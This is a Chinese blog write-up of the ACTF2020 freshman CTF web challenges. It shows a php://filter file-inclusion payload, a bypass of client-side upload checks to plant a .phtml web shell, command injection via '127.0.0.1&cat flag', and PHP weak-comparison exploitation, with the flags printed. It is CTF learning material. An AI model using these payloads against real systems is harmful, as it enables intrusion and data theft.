ACTF2020 新生赛

0x01 Include

  • 源代码中发现文件包含
  • payload:
?file=php://filter/read=convert.base64-encode/resource=flag.php

得到
PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NThkODk3MTItYjVjNC00OWQwLWE1ZDgtOGZiYTk2YmZjNmI0fQo=
解base64:

<?php
echo "Can you find out the flag?";
//flag{58d89712-b5c4-49d0-a5d8-8fba96bfc6b4}

0x02 Upload

  • 随便上传,显示规则
    该文件不允许上传,请上传jpg,png.gi结尾的图片!
  • 发现是这是js检测,抓包绕过
  • 抓包上传后,回显更改名字的图片
    Upload Success! Look here~ ./uplo4d/f3ccdd27d2000e3f9255a7e3e2c48800.jpg
  • 测试其他扩展名,成功
    ./uplo4d/1406a3b458d663eb5c3e61b80d160948.phtml
  • 蚁剑连接成功,getFlag

0x03 EXEC

  • payload:
127.0.0.1&ls
index.php
PING 127.0.0.1 (127.0.0.1): 56 data bytes

127.0.0.1&ls /    //一般在根目录
flag
...
PING 127.0.0.1 (127.0.0.1): 56 data bytes

127.0.0.1&cat flag
flag{349cb578-b365-424c-9c69-a75fb8d5e757}
PING 127.0.0.1 (127.0.0.1): 56 data bytes

0x04 BackupFile

  • dirsearch扫描
    python ./dirsearch.py -u http://3dc3d80d-11ca-4257-a22f-e4c07996818b.node3.buuoj.cn/ -e * --threads=1 --delay=0.1

太快会429

  • 找到index.php.bak,打开
<?php
include_once "flag.php";

if(isset($_GET['key'])) {
    $key = $_GET['key'];
    if(!is_numeric($key)) {//是否为数字
        exit("Just num!");
    }
    $key = intval($key);//转化为整型
    $str = "123ffwsfwefwf24r2f32ir23jrw923rskfjwtsw54w3";
    if($key == $str) {//弱类型比较,str变成123
        echo $flag;
    }
}
else {
    echo "Try to find out source file!";
}
  • payloadbuuoj.cn/?key=123
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值